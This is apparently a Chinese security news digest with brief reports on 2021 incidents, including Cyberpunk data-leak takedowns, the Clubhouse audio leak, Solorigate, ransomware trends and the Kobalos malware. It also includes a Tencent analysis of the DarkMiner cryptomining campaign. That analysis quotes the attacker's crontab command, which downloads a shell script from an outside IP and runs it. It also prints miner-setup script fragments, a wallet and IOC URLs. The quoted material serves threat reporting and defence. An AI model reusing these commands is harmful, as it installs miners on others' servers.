分类: 安全快讯

CD Projekt Red 引用 DMCA 扼杀链接被盗游戏数据的 Twitter 账户

CD Projekt Red是一家电子游戏开发商,其代表作品是2020年争议巨大的电子游戏之一《赛博朋克2077》。那款游戏非常令人期待,但推出后却出现了巨大的问题,以至于变成了其开发商的累赘,并激怒了全球等待多年才能玩到这款游戏的玩家。该公司不久前宣布,黑客进入了其服务器,并窃取了网上泄露的游戏数据。 正如你所预料的那样,已经有一些用户通过Twitter和其他社交网络链接到这些被盗数据。据报道,CD Projekt Red一直在使用DMCA的移除请求来消除链接到该被盗数据的推文甚至账户。报道指出,上周四,至少有两名Twitter用户通过一家版权监测公司的电子邮件收到了DMCA移除请求的通知。 报道指出,邮件中列出了对侵权行为的描述,包括链接到非法获取源代码的《Gwent: The Witcher Card Game》的源代码,公司认为他说,该链接导致了一个便利的入口,让其他人下载源代码。 DMCA取缔通知的目标还有至少其他三个Twitter用户。他们的推文被一条标准的Twitter DMCA提示消息所取代,指出内容已被删除,以回应版权持有人的报告。CD Projekt Red上周宣布被黑客攻击,并发布了一张黑客要求的赎金截图。 游戏开发商拒绝与黑客合作,也没有支付赎金。据报道,黑客正试图出售他们在攻击中获得的其他数据。         (消息及封面来源:cnBeta)

Clubhouse 音频数据遭泄露

2月22日上午消息,据报道,广受欢迎的音频聊天室应用Clubhouse曾表示将采取措施确保用户数据不会被恶意黑客或间谍窃取。然而现在,至少有一名网络攻击者证明了Clubhous平台的实时音频是可以被窃取的。 Clubhouse发言人瑞玛·巴纳西(Reema Bahnasy)表示,本周末,一位身份不明的用户能够将Clubhouse的音频从“多个房间”传送到他们自己的第三方网站上。 虽然Clubhouse公司表示将“永久禁止”这一用户,并配备了新的“安全措施”以防止此类事件再次出现。但仍有研究人员认为,Clubhouse平台可能永远无法兑现这样的承诺。 2月13日,斯坦福互联网天文台(Stanford Internet Observatory)首次公开提出了Clubhouse的安全问题。该机构周日晚些时候表示,使用这款只有受邀才能使用的iOS应用程序的用户应假定所有对话都会被录音。 Facebook公司前安全主管、SIO现任主管亚历克斯·斯塔莫斯(Alex Stamos)表示:“Clubhouse不能为发生在世界各地的任何一场谈话提供任何隐私承诺。” 斯塔莫斯和他的团队还证实,Clubhouse依靠一家总部位于上海的初创公司Agora Inc.来处理其大部分后台业务。斯塔莫斯称,虽然Clubhouse公司主要负责用户体验,比如添加新朋友和寻找房间,但该平台的数据流量处理和音频制作服务仍然依赖这家中国公司。 斯塔莫斯称,Clubhouse对Agora的依赖引发了广泛的隐私担忧。Agora表示,它不能对Clubhouse的安全或隐私协议发表评论,并坚称不会为任何客户“存储或共享个人身份信息”,Clubhouse只是其中之一。Agora公司表示:“我们致力于使我们的产品尽可能安全。” 上周末,网络安全专家注意到,有一些音频和元数据被从Clubhouse平台移到了另一个网站。位于澳大利亚堪培拉(Canberra, Australia)的Internet 2.0的首席执行官罗伯特·波特(Robert Potter)表示:“一个用户建立了一种与世界其他地方远程共享其登录信息的方法。真正的问题是,人们竟认为这些对话从来都是私密的。” 周末音频盗窃背后的幕后黑手围绕用于编译俱乐部会所应用程序的JavaScript工具包构建了自己的系统。斯塔莫斯认为,他们实际上是临时搭建了平台。SIO公开宣称尚未确定袭击者的来源或身份。 SIO的研究员杰克·凯布尔(Jack Cable)称,虽然Clubhouse拒绝解释究竟采取了哪些措施来防止类似的违规行为,但解决方案可能包括防止使用第三方应用程序访问聊天室音频而不实际进入聊天室,或者只是限制用户可以同时进入的聊天室数量。 最近,Clubhouse以10亿美元的估值融资了1亿美元。自1月中旬以来,Agora的股价已经飙升了150%以上,现在它的市值接近100亿美元。         (消息及封面来源:cnBeta)

手机位置信息可分析出隐私信息

在 iPhone 和某些 Android 机型中首次运行应用程序的时候,在使用位置数据之前需要征求你的许可。其中有个选项是只允许本次运行启用定位服务,而不是永久授权该应用程序。但这样严苛的地理位置策略并不意味着就能妥善保护你的数据,尤其在 Android 平台上。近日一项新研究揭示了如何仅从位置信息中就推断出可怕的额外数据量,并提出了处理应用程序可访问的位置数据的新方法,从而更好地保护个人隐私。 来自意大利博洛尼亚大学的 Mirco Musolesi 以及来自英国伦敦大学学院的 Benjamin Baron 两位安全研究专家试图确认通过位置追踪能够收集多少用户个人信息。他们为此开发了一款名为 TrackAdvisor 的应用程序,安装在 69 名用户的设备上。该应用在每台设备上运行了至少两周,追踪了超过 20 万个地点。 该应用识别了大约 2500 个地点,并收集了 5000 条与人口统计学和个性有关的个人信息。TrackAdvisor 只需查看收集到的位置信息,就能推断出志愿者的健康状况、社会经济状况、种族和宗教信仰等数据。这就是用户会认为是敏感和隐私的数据。 Musolesi 在一份声明中说:“用户在很大程度上没有意识到他们授予应用程序和服务的一些权限对隐私的影响,特别是在涉及位置跟踪信息时。由于机器学习技术,这些数据提供了敏感信息,如用户居住的地方,他们的习惯,兴趣,人口统计学,以及用户的个性信息”。 作者表示,这是第一次广泛的研究,阐明了可以从位置跟踪中了解到什么样的信息。在新闻稿中写道:“因此,这项研究也表明了收集这些信息是如何代表侵犯用户隐私的”。研究人员表示,这样的研究可以为改进应用程序中的位置跟踪政策铺平道路,以更好地保护用户隐私。这将涉及更细化的隐私控制,允许用户选择哪些类型的位置信息不应该与应用程序共享。       (消息及封面来源:cnBeta)

红杉资本遭黑客攻击 数据或遭泄露

据报道,硅谷顶尖风险投资公司红杉资本周五对投资者表示,在它的一名雇员遭遇网络钓鱼攻击后,该公司的一些个人信息和财务信息可能已被第三方窃取。红杉对投资者表示,目前还没有迹象表明这些被窃信息在暗网上交易,或者遭到不法分子利用。 红杉资本发言人周六证实,该公司“最近经历了一起网络安全事件”,其安全团队正在调查的此事。该公司表示,他们已经上报给执法部门,并且在与外部网络安全专家合作处理此事。 红杉发言人说:“我们很遗憾这次事件已经发生,目前已经通知了受此影响的个人。我们已经大举投资加强安全性,今后仍将继续应对不断发展的网络威胁。” 红杉的投资者被称作有限合伙人,通常包括大型金融机构、大学捐赠基金、私人家族理财室或主权财富基金,但风险投资公司很少会公开分享投资者的信息。 根据Pitchbook的数据,红杉资本是硅谷最老牌、最成功的风险投资公司之一,管理的资产超过380亿美元。这家拥有49年历史的风险投资公司已经投资了Airbnb、DoorDash和23andMe等公司。根据官网信息,它还投资了FireEye和Carbon Black等网络安全公司。 此次黑客入侵似乎与Solarwinds攻击无关,后者对FireEye构成较为严重的破坏,并对政府机构和微软等大型科技公司产生了影响。         (消息及封面来源:cnBeta)

微软:Solorigate 攻击未使客户数据泄露

2020年底,全球发生了一起重大网络攻击事件,横跨美国联邦部门、英国、欧洲议会等数千家机构受到影响。据悉,此次事件是由三大公司的供应链攻击引发的。SolarWinds,微软,和VMware, 攻击者能够借此访问大量私人文件和电子邮件。 这次攻击被微软称为 “Solorigate”,总裁布拉德·史密斯(Brad Smith)称其为 “清算时刻”。现在,该公司已经分享了Solorigate调查的最后进展。 微软公司安全、合规和身份认证副总裁Vasu Jakkal得出结论,虽然有国家背景的黑客能够破坏一些初始安全程序,但他们随后被 “统一的人类和数字保护团队”所阻止。她还澄清,公司没有发现客户数据或生产服务被入侵的证据。此外,调查证实,微软软件也没有被用来攻击其他主体。 微软表示,多种因素有助于限制此次攻击的范围,其他安全团队和组织也应该接受这些因素来推进工作。这些因素包括采用零信任安全模式,对凭证进行多因素认证,以及Azure Active Directory和Microsoft 365 Defender等云技术。最后,Jakkal强调,最重要的是公司和团队要共同加强集体防御。 微软安全响应中心(MSRC)接着表示。 虽然我们的内部调查已经结束,但这并不意味着事件会就此平息。这意味着我们依然要保持正常的 “零信任”安全态势,安全团队应该不断努力保护用户、设备和数据免受环境中持续存在的威胁。我们与网络安全社区的合作工作仍在继续,以保护我们免受持续的威胁,随着我们了解到更多的信息,我们将适当地分享学习和指导。 MSRC强调,即使攻击是在2020年12月发现的,各组织都在争分夺秒地减轻威胁,但它的分析显示,恶意行为者在2021年1月也依然在试图访问各类数据。微软已经澄清,在其所有服务中,攻击者只能够查看和下载Azure、Intune和Exchange的少量代码文件。被入侵的代码文件都不包含任何正在生产环境中使用的真实凭证。         (消息及封面来源:cnBeta)

加州车辆管理局警告称其承包商数据或遭泄露

加州车辆管理局(DMV)日前警告说,在一个承包商遭遇勒索软件攻击后,可能出现数据泄露。总部位于西雅图的自动资金转移服务(AFTS)表示,自2019年以来,DMV一直用于与国家数据库核实地址变更,本月早些时候受到了一个不明勒索软件的攻击。 DMV在通过电子邮件发送的一份声明中表示,此次攻击可能已经泄露了“过去20个月的加州车辆登记记录,其中包含姓名、地址、车牌号和车辆识别号”。但DMV表示,AFTS无法获取客户的社会安全号码、出生日期、选民登记、移民身份或驾照信息,并没有被泄露。 DMV表示,此后已经停止了所有向AFTS的数据传输,并在此后启动了一项紧急合同,以防止任何宕机。 AFTS在美国各地被用于处理付款、发票和核实地址。已经有几个市镇确认他们受到数据泄露的影响,这表明它可能并不限于加州的DMV。但目前还不知道是什么样的勒索软件袭击了AFTS。勒索软件通常会对公司的文件进行加密,并会解锁以换取赎金。但由于许多公司都有备份,一些勒索软件组织威胁说,除非支付赎金,否则将把被盗文件公布在网上。 AFTS无法立即获得评论。它的网站已经离线,并有一条简短的消息。“AFTS的网站和所有相关的支付处理网站由于技术问题而无法使用. 我们正在努力尽快恢复它们。” “我们正在研究实施更多的措施来加强安全性,以保护车管所和与我们签订合同的公司所持有的信息,”加州DMV局长史蒂夫·戈登说。 据报道,去年加州DMV通过出售司机的个人信息,包括向债券商和私人调查员出售信息,每年赚取超过5000万美元。 加州有超过3500万辆注册车辆。       (消息及封面来源:cnBeta)

Avast 披露 CacheFlow 更多细节

去年 12 月,知名网络安全公司 Avast 在 Chrome 和 Edge 扩展商城上发现了 28 个含有恶意代码的扩展程序,有超过 300 万互联网用户受到影响。今天,Avast 进一步披露了该恶意代买 CacheFlow 的相关细节。所幸的是自 2020 年 12 月 18 日起,谷歌和微软均已将所有恶意扩展删除。 这些恶意扩展程序之所以能够躲避谷歌和微软严苛的安全审查,关键原因在于该恶意扩展会尝试使用分析请求的 Cache-Control HTTP 标头来隐藏其命令并控制秘密通道中的流量。Avast 认为这是一项新的技术。Avast 认为攻击者增加了 Google Analytics(分析)样式的流量不仅是为了隐藏恶意命令,而且扩展作者也对分析请求本身感兴趣。 Avast 认为攻击的步骤如下: 基于 Avast 的遥测数据,受影响最严重的三个国家和地区是巴西、乌克兰和法国。 这些恶意扩展程序伪装成工具,帮助用户下载 Facebook、Instagram 等社交媒体或 Vimeo、Spotify 等流媒体平台网站中的内容,但其中的恶意代码允许下载恶意程序来窃取用户敏感数据,重定向到广告和钓鱼网站。 Avast表示,这28个扩展包含可能执行一些恶意操作的代码,包括: ● 将用户流量重定向到广告 ● 将用户流量重定向到钓鱼网站 ● 收集个人数据,如出生日期、电子邮件地址和活动设备 ● 收集浏览历史 ● 擅自在用户设备上下载更多的恶意软件           (消息及封面来源:cnBeta)

腾讯云防火墙成功拦截利用 Jenkins 未授权访问漏洞针对云主机的攻击

一、概述 腾讯云防火墙捕获一黑客团伙利用Jenkins未授权访问漏洞针对云服务器的攻击,若攻击者利用漏洞攻击得手,就会通过CURL命令下载shell脚本执行,并继续通过脚本部署挖矿木马。腾讯云防火墙成功拦截了这些攻击,遭遇攻击的主机未受损失。 通过分析腾讯云防火墙拦截到的黑客攻击指令,发现攻击者在部署挖矿程序的过程中,会修改系统最大内存页,以达到系统资源的充分利用,并且会多次检测挖矿进程的状态,从而对挖矿程序进行保活操作。 因其该团伙使用的挖矿账名为syndarksonig@gmail.com,腾讯威胁情报中心将该挖矿木马命名为DarkMiner。根据该挖矿团伙使用的挖矿钱包算力估算,该团伙控制了约3000台服务器挖矿。 腾讯安全专家建议政企用户按照以下步骤自查是否遭遇类似攻击: 检查服务器是否部署Jenkins组件,如有部署,应继续检查是否配置复杂密码。配置弱密码的系统极易被入侵; 检查服务器是否访问矿池:142.44.242.100; 检查服务器是否存在恶意文件:/tmp/ .admin_thread,如有及时kill进程并删除相关文件。 腾讯安全响应清单 腾讯安全系列产品已针对DarkMiner黑产团伙进行升级响应,具体清单如下: 应用 场景 安全产品 解决方案 威 胁 情 报 腾讯T-Sec 威胁情报云查服务 (SaaS) 1)DarkMiner团伙相关IOCs已入库。 各类安全产品可通过“威胁情报云查服务”提供的接口提升威胁识别能力。可参考:https://cloud.tencent.com/product/tics 腾讯T-Sec 高级威胁追溯系统 1)DarkMiner团伙相关信息和情报已支持检索。 网管可通过威胁追溯系统,分析日志,进行线索研判、追溯网络入侵源头。T-Sec高级威胁追溯系统的更多信息,可参考:https://cloud.tencent.com/product/atts 云原生 安全 防护 云防火墙 (Cloud Firewall,CFW) 基于网络流量进行威胁检测与主动拦截,已支持: 1)已支持识别检测DarkMiner团伙关联的IOCs; 2)已支持检测和拦截Jenkins未授权命令执行漏洞利用攻击 有关云防火墙的更多信息,可参考:  https://cloud.tencent.com/product/cfw 腾讯T-Sec  主机安全 (Cloud Workload Protection,CWP) 1)已支持查杀DarkMiner团伙相关木马程序; 2)已支持检测Jenkins未授权命令执行漏洞; 腾讯主机安全(云镜)提供云上终端的防毒杀毒、防入侵、漏洞管理、基线管理等。关于T-Sec主机安全的更多信息,可参考:https://cloud.tencent.com/product/cwp 腾讯T-Sec 安全运营中心 基于客户云端安全数据和腾讯安全大数据的云安全运营平台。已接入腾讯主机安全(云镜)、腾讯御知等产品数据导入,为客户提供漏洞情报、威胁发现、事件处置、基线合规、及泄漏监测、风险可视等能力。 关于腾讯T-Sec安全运营中心的更多信息,可参考:https://s.tencent.com/product/soc/index.html 非云企业安全防护 腾讯T-Sec 高级威胁检测系统 (腾讯御界) 1)已支持识别检测DarkMiner团伙关联的IOCs; 2)已支持检测Jenkins未授权命令执行漏洞利用攻击; 关于T-Sec高级威胁检测系统的更多信息,可参考: https://cloud.tencent.com/product/nta   二、详细分析 Jenkins是一个知名的独立开源软件项目,是基于Java开发的一种持续集成工具,用于监控持续重复的工作,该项目提供了一个开放易用的软件平台,使软件的持续集成变成可能。如果用户在使用jenkins 时未设置帐号密码,或者使用了弱帐号密码,可能导致未授权访问攻击。 如果用户未设置密码,会导致系统存在Jakins存在未授权访问漏洞。 黑客在未授权的情况下访问jenkins系统,并通过系统管理中的“脚本命令行”功能执行了恶意脚本。 腾讯云防火墙捕获到黑客利用Jenkins未授权访问漏洞利用进行攻击的日志。 此次攻击执行恶意命令为: 'sh','-c','crontab -r; echo "* * * * * curl http[:]//37.49.230.155/manager.sh | sh; wget -O- http[:]//37.49.230.155/manager.sh | sh" | crontab -' 接着脚本manager.sh执行挖矿木马下载和启动。 首先根据CPU支持的线程数量设置最大内存页,以达到CPU资源利用最大化: SYSTEM_ADMIN_RENAME=".admin_thread"THREAD_COUNT=$(cat /proc/cpuinfo | grep model | grep name | wc -l) #sysctl -w vm.nr_hugepages=$THREAD_COUNT_MBbash -c "echo vm.nr_hugepages=$(($THREAD_COUNT * 1000)) >> /etc/sysctl.conf"#bash -c "echo vm.nr_hugepages=$THREAD_COUNT >> /etc/sysctl.conf" echo "Threads: $THREAD_COUNT, Threads in MB: $(($THREAD_COUNT * 1000))" sysctl -w vm.nr_hugepages=$(($THREAD_COUNT * 1000)) && echo "SET hugepage $(($THREAD_COUNT * 1000))" #|| \#sysctl -w vm.nr_hugepages=$THREAD_COUNT && echo "SET hugepage $THREAD_COUNT" for i in $(find /sys/devices/system/node/node* -maxdepth 0 -type d); do       echo 3 > "$i/hugepages/hugepages-1048576kB/nr_hugepages"; done echo "1GB pages successfully enabled" 然后通过cat /proc/cpuinfo命令获取CPU类型,并判断是否属于支持的类型。 进入TMP目录下,判断挖矿进程是否已经在运行中。 for path in $TMP_DIR do   >$path/.f && cd $path && rm .f done (ps -x | grep -e "$SYSTEM_ADMIN_RENAME" | grep -v grep) > /dev/null 2>&1 如果没有在运行中,则下载xmrig挖矿木马到/tmp/ .admin_thread,伪装成系统管理进程“System manager”,然后启动挖矿程序。 挖矿使用矿池:142.44.242.100:14444 钱包: 25WSQDugR4bMr9KTsyuiWQawTpaavoxF9pNujecKTpr5MKKUvUyPyL9ZMXq9woLwiVkzcJgkhF39NdENkmEREVLM2ZoqAB 根据该钱包的平均算力40KH/s推算,共有3000台左右服务器被攻陷并植入挖矿木马。 并且该木马会多次检测挖矿进程运行状态,发现失活就重复挖矿程序部署过程,使用多个旷工名连接矿池进行挖矿,其中挖矿子账号名均为syndarksonig@gmail.com。 DarkMiner团伙使用的旷工名 small big xm4868 jenkin jenkin xm14856 mac server xm18614 focal xm959 xm22649 macmac xm1600 xm29274 xmrig worker28467 xm13222 stak xm7381 xmrig29684   IOCs URL http[:]//37.49.230.155/bot.arm5 http[:]//37.49.230.155/system_manager.sh http[:]//37.49.230.155/ssh.sh http[:]//37.49.230.155/manager.sh http[:]//37.49.230.155/xmrig http[:]//37.49.230.155/xmrig1 http[:]//37.49.230.155/xmrig2 http[:]//37.49.230.155/xmrig3 http[:]//37.49.230.155/xmrig4 http[:]//37.49.230.155/xmrig5 MD5 manager.sh f8631ea3001a1ee82b6ba4b96cc6b26f 钱包: 425WSQDugR4bMr9KTsyuiWQawTpaavoxF9pNujecKTpr5MKKUvUyPyL9ZMXq9woLwiVkzcJgkhF39NdENkmEREVLM2ZoqAB

Linux 恶意软件 Kobalos 曝光

安全公司 ESET 近日放出了一则警告,提醒一款被挂有木马的 OpenSSH 软件,或被用于从 HPC 高性能计算集群中窃取 SSH 证书。这款 Linux 恶意软件被称作 Kobalos,安全研究人员称之“小而复杂”且“诡计多端”。即使攻击规模不大,但 Kobalos 后门还是渗透了一些主要目标,包括美国政府、欧洲大学、以及亚洲某些大型互联网服务提供商(ISP)的系统。 参考希腊神话中一个顽皮的小动物,ESET 研究人员将这款恶意软件命名为 Kobalos 。但除了 Linux、FreeBSD 和 Solaris,安全专家还发现了能够在 AIX、甚至 Windows 平台上运行的恶意软件变种的蛛丝马迹。 通过逆向工程可知,Kobalos 能够在互联网上扫描受害者。而且在大多数情况下,受害者主要集中在大型系统和超级计算机领域(另有涉及部分私有服务器设施),但目前尚未揪出相关事件的幕后黑手。 过去一年,互联网上曝光了多起涉及 HPC 集群的安全事件。比如 EGI CSIRT 调查发现有计算资源被利用于加密货币的挖矿,受害者包括波兰、加拿大等地的受感染服务器。 新闻中还提到过英国的 Archer 超级计算机(其 SSH 证书被盗),但目前尚不清楚黑客利用哪些恶意软件对其发起了怎样的攻击。 ESET 研究人员补充道,尽管 Kobalos 的代码库很是精简,但却包含了用于运行命令和远程服务器控制的代码。 为缓解攻击,安全公司建议用户为 SSH 服务器连接同时启用双因素身份验证。 最后,ESET 将其检测到的这款恶意软件正式命名为 Linux / Kobalos(或 Linux / Agent.IV)。 而用于 SSH 证书窃取的程序,则被称作 Linux / SSHDoor.EV、Linux / SSHDoor.FB、或 Linux / SSHDoor.FC 。           (消息来源:cnBeta;封面源自网络)

报告称勒索软件赎金在减少

据外媒报道,虽然勒索软件仍是一个祸害,但现在也有一些好消息:受害者支付的平均金额在一年多的大幅增长后在Q4出现了下降。为什么呢?–因为越来越少的公司愿意屈服于赎金要求。来自网络安全公司Coveware公布的最新季度勒索软件报告显示,自2018年Q3以来,勒索软件的平均支付额持续上升,但在去年Q4下降34%,降至15.4108万美元。 与此同时,支付勒索软件费用的中位数也下降了55%,降至49,450美元。 一般来说,任何遭到勒索软件攻击的人都不被建议交出任何密码,因为这并不能保证作案者会交出加密密钥。似乎越来越多的公司开始听从这一建议。 该数据下滑的另一个原因则跟勒索软件攻击有关。犯罪分子威胁称,如果他们的要求得不到满足他们就会公布敏感信息。Coveware写道,这类攻击占Q4所有勒索软件攻击的70%,高于前一季度的50%。因为即使支付了赎金数据也会在网上泄露,所以很少有受害者会屈服于勒索。 在涉及数据被盗的案件中,只有60%的公司同意在Q4支付,低于第三季度的75%。 报告写道:“Coveware继续见证了被盗数据在付款后没有被删除或清除的迹象。此外,我们还看到一些组织在没有发生的情况下采取措施伪造数据外泄的样子。” 至于勒索软件的攻击载体,电子邮件钓鱼现在已经超过远程桌面协议(RDP)攻击成为最流行的网络攻击,其在Q4占比超过了50%。不过利用泄露的凭证的RDP仍非常流行,因为员工用户名和密码的勒索价低至50美元。 专业服务则是第二大最常见的勒索软件罪犯的目标行业–占比16.3%,仅次于医疗保健–占比17.9%。长期以来,医院和健康中心一直是犯罪分子认为他们更愿意掏钱的常见目标。随着疫情的蔓延,这些组织已经濒临崩溃的边缘,勒索软件的攻击则可能会造成生命的损失。             (消息及封面来源:cnBeta)